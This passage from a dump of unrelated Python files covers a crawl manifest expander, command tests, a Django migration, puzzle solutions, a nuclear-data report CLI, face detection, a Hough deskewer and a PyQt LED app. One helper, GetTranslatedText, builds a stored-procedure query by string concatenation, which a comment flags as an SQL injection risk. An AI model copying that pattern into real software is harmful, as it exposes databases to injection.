    for step in (createDB, defaultActivities, defaultPeople, defaultLocations, testEntries):
        step()
init()
|
996,638 | 6476dc4aede72f4e11ceb54868a4b4e1f3926d5c | import sys
def write_items(items, num):
    """Write the given items, one per line, to a file named NN_forumpage.txt."""
    out_name = str(num).zfill(2) + '_forumpage.txt'
    with open(out_name, 'w') as out:
        out.write('\n'.join(items))
def main():
    """Expand a crawl manifest into forumpage work-item files.

    Reads lines of the form ``forumpage:<site>:<forum>:<pages>`` from the
    file named by argv[1], expands each forum into page-range items of three
    pages each, and writes them (sorted) to numbered output files of at most
    200000 items, starting at the file number given by argv[2].
    """
    assert len(sys.argv) == 3
    items = set()
    num = int(sys.argv[2])
    with open(sys.argv[1], 'r') as f:
        for line in f:
            line = line.strip().split(':')
            # Skip member-page records and malformed lines. The original
            # `len(line) == 0` check could never trigger (split() always
            # returns at least one element), so blank lines crashed the
            # 3-way unpack below.
            if line[0] == 'memberpages' or len(line) != 4:
                continue
            site, forum, pages = line[1:]
            for i in range(1, int(pages)+1, 3):
                items.add(':'.join(['forumpage', site, forum,
                                    str(i) + '-' + str(i+2)]))
            if len(items) >= 200000:
                write_items(sorted(items), num)
                num += 1
                items = set()
    # Flush the remainder sorted as well; the original wrote the final batch
    # in arbitrary set order, unlike every earlier batch.
    write_items(sorted(items), num)
if __name__ == '__main__':
main()
|
996,639 | 36b0db8a803e78ecbaef4ac0b05f1536b0c70720 | """
This module will test the status command
"""
import time
from controller.app import Configuration
from tests import (
Capture,
create_project,
exec_command,
execute_outside,
init_project,
pull_images,
start_project,
start_registry,
)
def test_all(capfd: Capture) -> None:
    """End-to-end checks of the `status` command in swarm and compose mode.

    Builds a minimal project (postgres auth, no frontend) and verifies the
    status output before startup, after startup, and (swarm only) after a
    forced re-init and restart. Command order matters throughout.
    """
    # `status` must fail gracefully when run outside a project folder.
    execute_outside(capfd, "status")
    create_project(
        capfd=capfd,
        name="xx",
        auth="postgres",
        frontend="no",
    )
    init_project(capfd)
    start_registry(capfd)
    pull_images(capfd)
    # Before start: node information but no running service/container.
    if Configuration.swarm_mode:
        exec_command(
            capfd,
            "status",
            "Manager",
            "Ready+Active",
            "No service is running",
        )
    else:
        exec_command(
            capfd,
            "status",
            "No container is running",
        )
    start_project(capfd)
    # After start: services/containers must be listed as running.
    if Configuration.swarm_mode:
        exec_command(
            capfd,
            "status",
            "Manager",
            "Ready+Active",
            "xx_backend",
            "xx_postgres",
            " [1]",
            # No longer found starting because
            # HEALTHCHECK_INTERVAL is defaulted to 1s during tests
            # "starting",
            "running",
        )
        init_project(capfd, "", "--force")
        exec_command(
            capfd,
            "start --force",
            "Stack started",
        )
        time.sleep(4)
        exec_command(
            capfd,
            "status",
            "running",
        )
        exec_command(
            capfd,
            "status backend",
            "running",
        )
        exec_command(
            capfd,
            "status backend postgres",
            "running",
        )
    else:
        exec_command(
            capfd,
            "status",
            "xx-backend-1",
        )
        exec_command(
            capfd,
            "status backend",
            "xx-backend-1",
        )
        exec_command(
            capfd,
            "status backend postgres",
            "xx-backend-1",
        )
|
996,640 | 7001ab8bfd7d64f19cc9fe909689bd4ce91d7bb4 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
    # Adds the Correlation model: a float `value` computed between two Share
    # rows over a window of `day_interval` days (presumably a price
    # correlation -- verify against the app code that populates it).
    dependencies = [
        ('shares', '0014_auto_20151113_0916'),
    ]
    operations = [
        migrations.CreateModel(
            name='Correlation',
            fields=[
                ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),
                ('day_interval', models.PositiveSmallIntegerField()),
                ('value', models.FloatField()),
                # related_name='+' disables the reverse accessors on Share.
                ('input_shares', models.ForeignKey(related_name='+', to='shares.Share')),
                ('output_shares', models.ForeignKey(related_name='+', to='shares.Share')),
            ],
        ),
    ]
|
996,641 | 8b08bec8be01016f964716e433aa6cdccdca3def | """
This is a companion to my [previous
challenge](https://edabit.com/challenge/mZqMnS3FsL2MPyFMg).
Given an English description of an integer in the range **0 to 999** , devise
a function that returns the integer in numeric form.
### Examples
eng2nums("four") ➞ 4
eng2nums("forty") ➞ 40
eng2nums("six hundred") ➞ 600
eng2nums("one hundred fifteen") ➞ 115
eng2nums("seven hundred sixty seven") ➞ 767
### Notes
* No hyphens are used in test cases ("twenty three" not "twenty-three").
* The word "and" is not used: "one hundred three" not "one hundred and three".
"""
def eng2nums(s):
    """Convert an English description of an integer in 0..999 to an int.

    Handles forms like "four", "forty", "six hundred",
    "one hundred fifteen", "seven hundred sixty seven".
    No hyphens ("twenty three") and no "and" are expected.

    Raises:
        KeyError: if a word is not a recognized number word.
    """
    words = {
        'zero': 0, 'one': 1, 'two': 2, 'three': 3, 'four': 4, 'five': 5,
        'six': 6, 'seven': 7, 'eight': 8, 'nine': 9, 'ten': 10,
        'eleven': 11, 'twelve': 12, 'thirteen': 13, 'fourteen': 14,
        'fifteen': 15, 'sixteen': 16, 'seventeen': 17, 'eighteen': 18,
        'nineteen': 19, 'twenty': 20, 'thirty': 30, 'forty': 40,
        'fifty': 50, 'sixty': 60, 'seventy': 70, 'eighty': 80, 'ninety': 90,
    }
    total = 0
    for word in s.split(' '):
        if word == "hundred":
            # Scale what has been read so far ("six" -> 6 -> 600) with
            # arithmetic instead of the original str(z)+"00" string hack.
            total *= 100
        else:
            total += words[word]
    return total
print(eng2nums("six hundred forty six"))
|
996,642 | 1a4e5666dad3913bc491cf2f8ac804eb3471890e | import os
def print_file(filename):
    """Print the file name as a header followed by its numbered contents.

    Line numbers are zero-padded to three digits; each source line keeps its
    own newline, so print() uses end=''.
    """
    print("\n" + filename)
    print("=" * len(filename))
    with open(filename, "r") as f:
        # Iterate the file object directly instead of readlines(): avoids
        # materializing the whole file, and enumerate replaces the manual
        # counter.
        for lineno, line in enumerate(f, start=1):
            print(f"{lineno:03} : {line}", end='')
# Recursively pretty-print every .py file under the (machine-specific) demo
# directory. NOTE(review): the hard-coded drive path and the "\\" separator
# are Windows-only; os.path.join(dirname, f) would be portable.
for (dirname, dirs, files) in os.walk(r"e:\classroom\python\jan27\demo"):
    for f in files:
        if f.endswith(".py"):
            print_file(dirname + "\\" + f)
|
996,643 | 8e70e69e5a271c76bfb9c722e25aa8c337f27c86 | from typing import List
"""
Dynamic Programming
if a%b==0 and c%b==0, then c%a==0
Sort the nums and keep track of all nums before index i which meet the condition: nums[i]%nums[i-n]==0.
"""
class Solution:
    def largestDivisibleSubset(self, nums: List[int]) -> List[int]:
        """Return a largest subset where every pair divides evenly.

        DP over the sorted input: since divisibility chains compose
        transitively (if b%a==0 and c%b==0 then c%a==0), for each index we
        keep the longest divisible chain ending at that element, stored
        largest-first. Note: sorts `nums` in place, like the original.
        """
        if not nums:
            return []
        nums.sort()  # every divisor precedes its multiples
        # subsets[i] is the longest divisible chain ending at nums[i];
        # initially each element stands alone. (The unused `res` local from
        # the original has been removed.)
        subsets = [[n] for n in nums]
        for i in range(len(nums)):
            for j in range(i):
                if nums[i] % nums[j] == 0 and len(subsets[i]) < len(subsets[j]) + 1:
                    subsets[i] = [nums[i]] + subsets[j]
        return max(subsets, key=len)
996,644 | 9165d511a6659e3c6e7eb8094801b8e365e6e64a | """ Abstract class module for unified
"""
from abc import abstractmethod
from lead2gold.motif.motif import Motif
class Tool():
    """Base abstract class for known motif tools and their required functions.

    NOTE(review): this class does not inherit abc.ABC, so @abstractmethod is
    not actually enforced at instantiation time; subclasses are expected to
    override parse() and print() by convention. The method name `print`
    intentionally mirrors the tool API but shadows the builtin.
    """
    def __init__(self, toolName):
        """Store the tool's name; all other state defaults are per-subclass.

        Args:
            toolName: identifier of the concrete tool.
        """
        self.toolName = toolName
    @abstractmethod
    def parse(self, file_path, type=None):
        """Parse motifs from the given motif file.

        A tool should recognize the input type, but for speedup this can be
        skipped by passing `type` explicitly. Implementations should raise
        as soon as possible if the motif does not seem to be in valid format.

        Args:
            file_path: path of the motif file.
            type: type of tool output (stdout, .meme, .w2, etc.).

        Returns:
            A list of Motif objects.
        """
        return [Motif()]
    @abstractmethod
    def print(self, motif, file_path):
        """Write a motif to a file in this tool's format.

        Args:
            motif: the Motif object to serialize.
            file_path: file where the motif will be saved.

        Returns:
            None.
        """
        return None
|
996,645 | 302459c5be3f70081bb28be495b7605e54672f66 | #!/usr/bin/env python
import os.path, sys, argparse
sys.path.append(os.path.split(__file__)[0]+os.sep+'..')
from inter import *
# -------------------------------------------------------------------------------
# Comamnd line parsing
# -------------------------------------------------------------------------------
def parse_arguments():
    '''Parse the command line and return the argparse.Namespace of options.

    Option availability depends on the module-level TURNONNEUTRONNSOURCES
    flag (imported from inter) for the neutron-source options, and the
    'nsources' report choice.
    '''
    parser = argparse.ArgumentParser(\
        description='''
Super fancy replacement for legacy INTER format.
This does everything that legacy INTER does (use the "--legacyINTERReport" option), and so much more.
        ''')
    # Required command line options
    parser.add_argument('ENDF', type=str, help='ENDF file(s) whose cross section you want to study.' )
    # Set output
    parser.add_argument('-o', dest='outFile', default=None, type=str, help='Output to a file called OUTFILE, instead of printing to stdout.' )
    # Verbosity
    parser.add_argument('-v', dest='verbose', default=False, action='store_true', help="Enable verbose output." )
    # Control covariance usage
    parser.add_argument('--noCovariance', dest='useCovariance', action='store_false', help="Do not use covariance when computing values")
    parser.add_argument('--useCovariance', dest='useCovariance', action='store_true', default=True, help="If an evaluation has them, use covariances when computing values (the default)")
    # Limit output to certain things, such as MT or angular momenta J, L, S, and therefore Pi
    parser.add_argument('--MT', type=int, default=None, help='If given, only work with this MT.' )
    parser.add_argument('--MTList', default=None, choices=['legacy', 'major', 'all'], help='')
    # parser.add_argument('--L', type=int, default=None, help="If given, only work with this L, orbital angular momentum of channel" )
    # parser.add_argument('--J', type=int, default=None, help="If given, only work with this J, total angular momentum of channel" )
    # parser.add_argument('--S', type=int, default=None, help="If given, only work with this S, spin of compound nucleus formed" )
    # Astrophysics metrics of cross section data
    parser.add_argument('--MACS', type=float, default=None, help="Compute MACS, give kT in keV as argument" )
    parser.add_argument('--ARR', type=float, default=None, help="Compute astrophysical reaction rate, give kT in keV as argument")
    # Nuclear enginering metrics of cross section data
    parser.add_argument('--RI', default=False, action='store_true', help="Compute resonance integral, cut off at 0.5 eV")
    parser.add_argument('--thermal', default=False, action='store_true', help="Compute thermal cross section")
    parser.add_argument('--Westcott',default=False, action='store_true', help="Compute Westcott factor")
    parser.add_argument('--ALF', default=False, action='store_true', help="(capture cs)/(fission cs) at thermal")
    parser.add_argument('--ETA', default=False, action='store_true', help="nubar*(fission cs)/(absorption cs) at thermal")
    # Integral metrics of cross section data
    parser.add_argument('--CfSpectAnalytic',default=False, action='store_true', help="Compute 252Cf spontaneous fission spectrum average, using analytic approximation of [FIXME]")
    parser.add_argument('--CfSpect',default=False, action='store_true', help="Compute 252Cf spontaneous fission spectrum average")
    parser.add_argument('--14MeV', dest='fourteen', default=False, action='store_true', help="Get 14 MeV point")
    parser.add_argument('--Godiva', default=False, action='store_true', help="Compute Godiva (HMF001) assembly spectrum average")
    parser.add_argument('--Jezebel', default=False, action='store_true', help="Compute Jezebel (PMF001) assembly spectrum average")
    parser.add_argument('--BigTen', default=False, action='store_true', help="Compute BigTen (IMF007) assembly spectrum average")
    parser.add_argument('--FUNDIPPE', default=False, action='store_true', help="Compute FUND-IPPE (FIXME) assembly spectrum average")
    # Popular neutron sources (only exposed when enabled at module level)
    if TURNONNEUTRONNSOURCES: parser.add_argument('--ddSource', default=None, type=float, help="Compute spectrum average using d(d,n)3He reaction as a neutron source, argument is deuteron energy in MeV.")
    if TURNONNEUTRONNSOURCES: parser.add_argument('--dtSource', default=None, type=float, help="Compute spectrum average using d(t,n)4He reaction as a neutron source, argument is deuteron energy in MeV.")
    if TURNONNEUTRONNSOURCES: parser.add_argument('--ptSource', default=None, type=float, help="Compute spectrum average using p(t,n)3He reaction as a neutron source, argument is proton energy in MeV.")
    if TURNONNEUTRONNSOURCES: parser.add_argument('--pLiSource', default=None, type=float, help="Compute spectrum average using p(7Li,n)7Be reaction as a neutron source, argument is proton energy in MeV.")
    # Resonance metrics
    parser.add_argument('--scatteringRadius', default=False, action='store_true', help="FIXME")
    parser.add_argument('--neutronStrengthFunction', default=False, action='store_true', help="FIXME")
    parser.add_argument('--neutronPoleStrength', default=False, action='store_true', help="FIXME")
    parser.add_argument('--gammaStrengthFunction', default=False, action='store_true', help="FIXME")
    parser.add_argument('--averageWidth', default=False, action='store_true', help="Average resonance width per channel in both the RRR and URR")
    parser.add_argument('--meanLevelSpacing', default=False, action='store_true', help="Mean level spacing per channel in both the RRR and URR")
    parser.add_argument('--DysonMehtaDelta3', default=False, action='store_true', help="FIXME")
    parser.add_argument('--effectiveDOF', default=False, action='store_true', help="FIXME")
    parser.add_argument('--transmissionCoeff', default=False, action='store_true', help="Transmision coefficient per channel in both the RRR and URR, computed by Moldauer's sum rule")
    # Full report controls
    reportChoices=['astrophysics','engineering','integral','resonance','legacy','summary']
    if TURNONNEUTRONNSOURCES: reportChoices.append('nsources')
    parser.add_argument('--report', default=None, choices=reportChoices, help='Style of report to generate (Default: None)')
    parser.add_argument('--reportFormat', default='txt', choices=['html','txt','csv','json'], help="Format of output report (Default:txt)")
    return parser.parse_args()
# -------------------------------------------------------------------------------
# Main!!
# -------------------------------------------------------------------------------
if __name__ == "__main__":
    # NOTE(review): Python 2 syntax (print statements below); run with python2.
    # Parse command line
    theArgs = parse_arguments()
    # Set the MTList: legacy mode pins the classic INTER reactions, an
    # explicit --MT wins next, then the 'major' preset, else no filter.
    if theArgs.report == 'legacy' or theArgs.MTList == 'legacy':
        theArgs.MTList = [1,2,102,18]
    elif theArgs.MT != None:
        theArgs.MTList = [theArgs.MT]
    elif theArgs.MTList == 'major':
        theArgs.MTList = [1,2,4,16,17,22,102,103,107,18]
    else:
        theArgs.MTList=None
    # Read in evaluation
    rep=EvaluationReport(theArgs.ENDF,theArgs.MTList)
    # Reaction table
    if theArgs.report is None or theArgs.report in ['astrophysics','engineering','integral','legacy','summary']:
        rep.get_reaction_metrics(theArgs)
    # ALF, ETA addendum
    if theArgs.report is None or theArgs.report in ['engineering','summary']:
        rep.get_global_metrics(theArgs)
    # Resonance table
    if theArgs.report in ['resonance','summary']:
        rep.get_resonance_metrics(theArgs)
    if theArgs.scatteringRadius:
        print computeScatteringRadius(rep.reactionSuite.getReaction('elastic').crossSection)
    # ---------------------------------
    # Generate report
    # ---------------------------------
    if theArgs.reportFormat=='txt': report = rep.text_report(theArgs)
    elif theArgs.reportFormat=='json': report = rep.json_report(theArgs)
    elif theArgs.reportFormat=='csv': report = rep.csv_report(theArgs)
    elif theArgs.reportFormat=='html': report = '\n'.join(rep.html_report(theArgs))
    else: raise ValueError("Output format %s unknown"%theArgs.reportFormat)
    # Output report
    if theArgs.outFile is None: print report
    else: open(theArgs.outFile,mode='w').write(report)
|
996,646 | 0c54bbc7d7f2cbca2b790ce3b6145c118136d077 | def GetTranslatedText(tag, languageCode):
    """Look up the translation for `tag` in `languageCode` via a stored procedure.

    NOTE(review): the SQL below is built by string concatenation of the
    inputs -- a SQL injection risk if tag/languageCode come from untrusted
    sources; parameterized cursor.execute arguments would be safer.
    NOTE(review): if cursor creation or execute raises, `translated_text`
    (and possibly `cursor` in the finally block) is unbound, turning the
    error into a NameError at/after return.
    """
    # establish database connection
    import database
    import pyodbc
    connectionString = database.GetConnectionString()
    conn = pyodbc.connect(connectionString)
    #rowsAffected = 0 # problems getting rows affected from MS SQL...
    try:
        # create query and run it
        SQL = r'exec dbo.SP_TRANS_GetGetTranslatedText @tag = ' + "'" + str(tag) + "', " + '@language_code = '+ "'" + str(languageCode) + "'"
        cursor = conn.cursor()
        cursor.execute(SQL)
        translated_text = "---"
        translated_text = cursor.fetchone().Text
    except pyodbc.Error as err:
        print("Databasefeil: %s" % err)
    except:
        # Bare except: swallows all other errors (including the AttributeError
        # when fetchone() returns no row), leaving the "---" fallback.
        print("Generell feil!")
    finally:
        cursor.close()
        conn.close()
    return translated_text
# DONE Add function to add user language dynamically using Google translate?
def GoogleTranslate(language_code, text_eng):
    """Translate English text into `language_code` via the Google Translate API."""
    # get translation from Google Translate API
    from googletrans import Translator
    return Translator().translate(text_eng, src='en', dest=language_code).text
def update_translations():
    """Translate every queued row and write the results back to Translation.

    NOTE(review): if conn.cursor() itself raises, `cursor` is unbound in the
    finally block (NameError); the bare `except:` below also hides errors.
    """
    # TODO create function that accept stored procedure name, runs it and handles errors
    # establish database connection
    import database
    import pyodbc
    connectionString = database.GetConnectionString()
    conn = pyodbc.connect(connectionString)
    #rowsAffected = 0 # problems getting rows affected from MS SQL...
    try:
        # create query and run it
        SQL = r'exec dbo.SP_TRANS_GetTranslationQueue'
        cursor = conn.cursor()
        cursor.execute(SQL)
        # Queue rows: (TranslationID, language_id, language_code, tag, english text)
        for row in cursor.fetchall():
            trans_id = row[0]
            #language_id = row[1]
            language_code = row[2]
            #trans_tag = row[3]
            text_eng = row[4]
            text_trans = GoogleTranslate(language_code, text_eng)
            #text_trans = "Dette er en test"
            # update Translate-table with translation (parameterized, committed per row)
            cursor.execute("UPDATE Translation SET Text = ? WHERE TranslationID = ?", text_trans, trans_id)
            cursor.commit()
    except pyodbc.Error as err:
        print("Databasefeil: %s" % err)
    except:
        print("Generell feil!")
    finally:
        cursor.close()
        conn.close()
|
996,647 | 89669610d822e1d2753e0da5fad8cd767264ff3d | # from keras.models import load_model
# # load the model
# model = load_model('facenet_keras.h5')
# # summarize input and output shape
# print(model.inputs)
# print(model.outputs)
# function for face detection with mtcnn
from PIL import Image
from numpy import asarray
from mtcnn.mtcnn import MTCNN
# extract a single face from a given photograph
def extract_face(filename, required_size=(160, 160)):
    """Locate the first face in an image file and return it as an RGB pixel array.

    Opens (and displays) the image, runs MTCNN face detection, crops the
    first detected bounding box, resizes the crop to required_size, displays
    it, and returns it as a numpy array.
    """
    # load image from file and show it
    source = Image.open(filename)
    source.show()
    # convert to RGB, if needed, then to a pixel array
    rgb = source.convert('RGB')
    pixel_data = asarray(rgb)
    print("pixeks as arrya =============<>", pixel_data)
    # detect faces with an MTCNN detector using default weights
    detections = MTCNN().detect_faces(pixel_data)
    # bounding box of the first detected face
    x1, y1, box_w, box_h = detections[0]['box']
    # bug fix: the detector can report slightly negative coordinates
    x1, y1 = abs(x1), abs(y1)
    # crop the face region and resize it to the model's input size
    crop = pixel_data[y1:y1 + box_h, x1:x1 + box_w]
    face_image = Image.fromarray(crop).resize(required_size)
    face_image.show()
    return asarray(face_image)
# load the photo and extract the face
pixels = extract_face('./vT1.jpg');
print("pixels ======>", pixels); |
996,648 | 6899645de75426f47a97c2e9ef5aab81e61218e3 | /home/vinay/anaconda3/lib/python3.7/warnings.py |
996,649 | e65a11a661ca0009e21bc49c121cfef9ebb2343e | import sys
# Quaternion unit multiplication table: MAPPING[a][b] = (unit, sign) such
# that a * b == sign * unit, following Hamilton's rules (i*j=k, j*k=i,
# k*i=j, and i*i = j*j = k*k = -1).
MAPPING = {
    '1': {'1': ('1', 1), 'i': ('i', 1), 'j': ('j', 1), 'k': ('k', 1)},
    'i': {'1': ('i', 1), 'i': ('1', -1), 'j': ('k', 1), 'k': ('j', -1)},
    'j': {'1': ('j', 1), 'i': ('k', -1), 'j': ('1', -1), 'k': ('i', 1)},
    'k': {'1': ('k', 1), 'i': ('j', 1), 'j': ('i', -1), 'k': ('1', -1)},
}
def multQ(a, b):
    """Multiply two signed quaternion units, each given as (unit, sign)."""
    unit, sign = MAPPING[a[0]][b[0]]
    return (unit, sign * a[1] * b[1])
def simplify(vals, X):
    """Return True iff vals repeated X times multiplies to -1 AND its prefix
    products pass through i, then k (= i*j), in order.

    Python 2 code (xrange). vals is a list of (unit, sign) pairs; the
    three-stage `step` tracker proves the repeated string can be split into
    consecutive pieces equal to i, j and k.
    """
    step = 0;
    val = ('1', 1)
    for i in xrange(X):
        for c in vals:
            val = multQ(val, c)
            # Milestones of the running product: i (stage 1), i*j = k
            # (stage 2), i*j*k = -1 (stage 3).
            if step == 0 and val[0] == 'i' and val[1] == 1:
                step = 1
            elif step == 1 and val[0] == 'k' and val[1] == 1:
                step = 2
            elif step == 2 and val[0] == '1' and val[1] == -1:
                step = 3
    if step != 3: return False
    # The total product of all X repetitions must itself equal -1.
    return val[0] == '1' and val[1] == -1
# Since the file structure is 100% ensured, just skip the line count
# NOTE(review): Python 2 code (xrange, print statement). Reads T cases from
# stdin; each case gives a length L (unused -- the string is read whole), a
# repetition count X, and the unit string itself.
T = int(sys.stdin.readline().strip())
for i in xrange(T):
    [L, X] = sys.stdin.readline().strip().split(' ')
    vals = [(c, 1) for c in sys.stdin.readline().strip()]
    valid = simplify(vals, int(X))
    # i*j*k == -1, so we just need to ensure that the final result is -1.
    print "Case #%d: %s" % (i + 1, valid and 'YES' or 'NO')
|
996,650 | 5b7ab0d3df7f2b9ede5cd14add2a049d991efc43 | import cv2
import matplotlib.pyplot as plt
#importazione delle librerie necessarie
import numpy as np
import math
def houghSpace(im):
maxTheta = 180
#la larghezza dello spazio corrisponde alla massima angolatura presa in considerazione
houghMatrixCols = maxTheta
#dimensioni dell'immagine originale
h, w = im.shape
#non puo' esistere nell'immagine una distanza superiore alla diagonale
rhoMax = math.sqrt(w * w + h * h)
#l'altezza dello spazio è il doppio della rho massima, per considerare anche
#le rho negative
houghMatrixRows = int(rhoMax) * 2 + 1
#le rho calcolate verranno traslate della metà dell'altezza per poter rappresentare nello spazio
#anche le rho negative
rhoOffset = houghMatrixRows/2
#riscalature per passare da angoli a radianti
degToRadScale = 0.01745329251994329576923690768489 # Pi / 180
#$seno e coseno precalcolati
rangemaxTheta = range(0,maxTheta)
sin, cos = zip(*((math.sin(i * degToRadScale), math.cos(i * degToRadScale)) for i in rangemaxTheta))
#inizializzazione dello spazio
houghSpace = [0.0 for x in range(houghMatrixRows * houghMatrixCols)]
#scorro tutta l'immagine originale
for y in range(0, h):
for x in range(0, w):
#per ogni punto di bordo
if im[y, x] > 0:
#calcolo il suo fascio di rette...
for theta in rangemaxTheta:
#... per ogni angolazione theta nello spazio, calcolo il relativo valore di rho
#... utilizzando la forma polare dell'equazione della retta
rho = int(round(x * cos[theta] + y * sin[theta] + rhoOffset))
#una volta note le coordinate theta e rho, incremento il contatore dello spazio di Hough
# alla coordinata
c = rho * houghMatrixCols + theta
houghSpace[c] = houghSpace[c] + 1
# normalizzazione tra 0 e 1
m = np.max(houghSpace)
houghSpace = houghSpace / m
return np.reshape(houghSpace , (houghMatrixRows, houghMatrixCols)) #reshape in forma matriciale
filename = r'img\img3.jpg'
# load the image from disk as grayscale
im = cv2.imread(filename, cv2.IMREAD_GRAYSCALE)
h, w = im.shape
# downscale the image to one third
# NOTE(review): w/3 and h/3 are floats on Python 3, which cv2.resize
# rejects -- this line assumes Python 2 integer division.
im = cv2.resize(im, (w/3,h/3))
# Canny edge detector
im = cv2.Canny(im, 100, 200)
# compute the Hough space of the input edge image
hSpace = houghSpace(im)
# display the resulting space with a colorbar
h, w = hSpace.shape
fig, ax = plt.subplots(figsize=(10, 10))
cax = ax.imshow(hSpace, extent=[0,w,0,h])
plt.colorbar(cax, ticks=[0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9, 1])
plt.show()
# keep only the strongest peaks
hSpace[hSpace < 0.8] = 0
# column-wise (per-theta) histogram of the surviving peaks
hist = sum(hSpace)
# angle perpendicular to the dominant line orientation
theta1 = 90 - np.argmax(hist)
# re-read the image in color
im = cv2.imread(filename, cv2.IMREAD_COLOR)
# rotate the image about its center to deskew it
h, w, d = im.shape
rotation_M = cv2.getRotationMatrix2D((w / 2, h / 2), -theta1, 1)
rotated_im = cv2.warpAffine(im, rotation_M, (w,h), flags=cv2.INTER_CUBIC)
cv2.imwrite(r'img\rotated.jpg', rotated_im) |
996,651 | 192bfc7adeb2d55c013a8f5d146d9987ed50f339 | # displayMenu:
# displays a menu with options
# DO NOT MODIFY THIS FUNCTION
import Library as Library
if __name__ == "__main__":
    def display_menu():
        """Print the numbered list of main-menu options."""
        print("Select a numerical option:")
        print("======Main Menu=====")
        entries = (
            "Read book file",
            "Read user file",
            "Print book list",
            "Get rating",
            "Find number of books user rated",
            "View ratings",
            "Get average rating",
            "Add a user",
            "Checkout a book",
            "Get recommendations (not implemented yet)",
            "Quit",
        )
        for number, entry in enumerate(entries, start=1):
            print("{}. {}".format(number, entry))
if __name__ == "__main__":
    # Interactive menu loop: dispatches on the user's numeric choice until
    # option 11 (Quit). Most actions require both books (option 1) and users
    # (option 2) to be loaded first; Library methods signal errors with
    # negative return codes (-1 empty, -2 full, -3 not found, -4 bad rating).
    my_lib = Library.Library()
    choice = "-1"
    while choice != 11:
        display_menu()
        choice = input()
        try:
            choice = int(choice)
        except:
            print("Invalid input")
            continue
        if choice == 1:
            # Load the book database from a file.
            filename = input("Enter a book file name:\n")
            a = int(my_lib.read_books(filename))
            if a == -1:
                print('No books saved to the database.')
            if a == -2:
                print('Database is already full. No books were added.')
            if a == int(my_lib.get_size_books()):
                print("Database is full. Some books may have not been added.")
            if a != -1 and a != -2 and a != int(my_lib.get_size_books()):
                print('Total books in the database:', a)
        elif choice == 2:
            # Load user ratings from a file.
            filename = input("Enter a user file name:\n")
            b = int(my_lib.read_ratings(filename))
            if b == -1:
                print("No users saved to the database.")
            if b == -2:
                print("Database is already full. No users were added.")
            if b == int(my_lib.get_size_users()):
                print("Database is full. Some users may have not been added.")
            if b != -1 and b != -2 and b != int(my_lib.get_size_users()):
                print('Total users in the database:', b)
        elif choice == 3:
            if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
                print('Database has not been fully initialized.')
            else:
                my_lib.print_all_books()
        elif choice == 4:
            if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
                print('Database has not been fully initialized.')
            else:
                # Get a user name from the user's input
                username = input('Enter user name:\n')
                # Get a book title from the user's input
                booktitle = input('Enter book title:\n')
                c = int(my_lib.get_rating(username,booktitle))
                if c == 0:
                    print(username,'has not rated', booktitle)
                if c == -3:
                    print(username,'or', booktitle, 'does not exist')
                if c != 0 and c != -3:
                    print(username, 'rated', booktitle, 'with', c)
        elif choice == 5:
            if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
                print('Database has not been fully initialized.')
            else:
                username = input('Enter user name:\n')
                d = int(my_lib.get_count_read_books(username))
                if d == 0:
                    print(username,'has not rated any books')
                if d == -3:
                    print(username,'does not exist')
                if d != 0 and d != -3:
                    print(username, 'rated', d, 'books')
        elif choice == 6:
            if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
                print('Database has not been fully initialized')
            else:
                username = input('Enter user name:\n')
                my_lib.view_ratings(username)
        elif choice == 7:
            if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
                print('Database has not been fully initialized.\n')
            else:
                booktitle = input('Enter book title:\n')
                a = my_lib.calc_avg_rating(booktitle)
                if int(a) == -3:
                    print(booktitle, 'does not exist\n')
                else:
                    print('The average rating for', booktitle, 'is', a)
            print()
            continue
        elif choice == 8:
            username = input('Enter the new user\'s name:\n')
            b = my_lib.add_user(username)
            if b == -2:
                print("Database is full.", username,"was not added")
                print()
            if b == 0:
                print(username, 'already exists in the library')
                print()
            if b != -2 and b != 0:
                print('Welcome to the library,', username)
                print()
            continue
        elif choice == 9:
            if int(my_lib.get_num_users()) == 0 or int(my_lib.get_num_books()) == 0:
                print('Database has not been fully initialized.')
                print()
            else:
                username = input('Enter the new user\'s name:\n')
                booktitle = input('Enter book title:\n')
                newrating = int(input('Enter rating for the book:\n'))
                c = my_lib.check_out_book(username, booktitle, newrating)
                if c == -4:
                    print('Rating is not valid')
                    print()
                if c == -3:
                    print(username, 'or', booktitle, 'does not exist')
                    print()
                if c != -4 and c!= -3:
                    print("Hope you enjoyed your book; the rating has been updated.")
                    print()
            continue
        elif choice == 10:
            # haven't decided what to do..lol
            continue
        elif choice == 11:
            print("Goodbye!")
        else:
            print("Invalid input")
        print()
|
996,652 | 385d1513724f5e99a6f37494992bea51312d3b6e | #!/usr/bin/env python
from PyQt4 import QtGui
from PyQt4 import QtCore
from led_classes import *
from db_classes import *
import time
class Example(QtGui.QWidget):
    """PyQt4 window that streams messages from a Db onto an LED display.

    NOTE(review): this file is Python 2 (print statements); the source dump
    lost its indentation, so nesting below was reconstructed from context --
    verify against the original file.
    """

    def __init__(self):
        super(Example, self).__init__()
        # Cooperative flags: stopLed() sets self.stop, runLed() polls it.
        self.stop = False
        self.running = False
        self.initUI()

    def initUI(self):
        # Build the On/Off buttons and a status label, then show the window.
        QtGui.QToolTip.setFont(QtGui.QFont('arial'))
        self.setToolTip('This is a <b>QWidget</b> widget')
        btn = QtGui.QPushButton('On', self)
        btn.resize(btn.sizeHint())
        btn.move(50, 50)
        btn.clicked.connect(self.runLed)
        btn2 = QtGui.QPushButton('Off', self)
        # NOTE(review): uses btn.sizeHint() (not btn2's) -- likely copy-paste,
        # harmless since both buttons hold short labels.
        btn2.resize(btn.sizeHint())
        btn2.move(150, 50)
        btn2.clicked.connect(self.stopLed)
        self.label = QtGui.QLabel(self)
        self.label.setText('Welcome to airmess')
        self.label.setGeometry(50, 150, 200, 30)
        self.setGeometry(100, 40, 400, 400)
        self.setWindowTitle('Airmess')
        self.show()

    def stopLed(self):
        # Ask the runLed() loop to terminate at its next checkpoint.
        self.stop=True

    def runLed(self):
        # Start the scrolling-message loop; the flag guards double-starts.
        if(self.running==False):
            self.running=True
            db = Db()
            transmission = Transmission()
            window = Window(transmission)
            transmission.warmUp()
            time.sleep(1)
            transmission.wakeUp()
